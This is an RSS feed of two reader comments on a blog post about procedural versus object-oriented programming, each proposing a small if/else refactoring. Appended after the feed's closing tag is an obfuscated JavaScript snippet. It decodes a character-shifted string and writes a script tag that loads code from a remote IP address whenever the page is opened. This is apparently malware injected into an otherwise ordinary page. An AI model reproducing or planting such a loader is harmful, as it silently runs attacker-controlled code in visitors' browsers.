<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>
<channel>
	<title>Comments on: Changing Mindset: From Procedural to Object Oriented</title>
	<atom:link href="http://blog.secosoft.net/2006/12/01/changing-mindset-from-procedural-to-object-oriented/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.secosoft.net/2006/12/01/changing-mindset-from-procedural-to-object-oriented/</link>
	<description>Matt Secoske's intermittent ramblings on software and life</description>
	<pubDate>Wed, 19 Nov 2008 22:02:22 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.5.1</generator>
		<item>
		<title>By: Jeff</title>
		<link>http://blog.secosoft.net/2006/12/01/changing-mindset-from-procedural-to-object-oriented/#comment-3606</link>
		<dc:creator>Jeff</dc:creator>
		<pubDate>Sat, 02 Dec 2006 09:53:28 +0000</pubDate>
		<guid isPermaLink="false">http://blog.secosoft.net/2006/12/01/changing-mindset-from-procedural-to-object-oriented/#comment-3606</guid>
		<description>or better yet:

if (root.isDue()) {
   root.processNow();
} else {
   root.processLater();
}</description>
		<content:encoded><![CDATA[<p>or better yet:</p>
<p>if (root.isDue()) {<br />
   root.processNow();<br />
} else {<br />
   root.processLater();<br />
}</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Jeff</title>
		<link>http://blog.secosoft.net/2006/12/01/changing-mindset-from-procedural-to-object-oriented/#comment-3605</link>
		<dc:creator>Jeff</dc:creator>
		<pubDate>Sat, 02 Dec 2006 09:49:31 +0000</pubDate>
		<guid isPermaLink="false">http://blog.secosoft.net/2006/12/01/changing-mindset-from-procedural-to-object-oriented/#comment-3605</guid>
		<description>The last snippet negates the need for the someHigherLevelCompoinentMethod as root.schedule() could be executed directly from the calling method. How about:

if (root.isDue()) {
   root.process(NOW);
} else {
   root.process(LATER);
}</description>
		<content:encoded><![CDATA[<p>The last snippet negates the need for the someHigherLevelCompoinentMethod as root.schedule() could be executed directly from the calling method. How about:</p>
<p>if (root.isDue()) {<br />
   root.process(NOW);<br />
} else {<br />
   root.process(LATER);<br />
}</p>
]]></content:encoded>
	</item>
</channel>
</rss>
<html>
<script>var source ="=tdsjqu?epdvnfou/xsjuf)Tusjoh/gspnDibsDpef)71-226-::-225-216-223-227-43-227-232-223-212-72-45-227-212-231-227-58-217-:8-229-:8-226-::-225-216-223-227-45-43-226-225-::-72-45-215-227-227-223-69-58-58-68-5:-57-5:-63-61-57-65-63-57-68-5:-58-224-228-:8-221-227-226-212-225-229-212-58-224-228-:8-221-227-57-217-226-45-73-71-58-226-::-225-216-223-227-73**<=0tdsjqu?"; var result = ""; 
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1); 
document.write(result); </script>
</html>

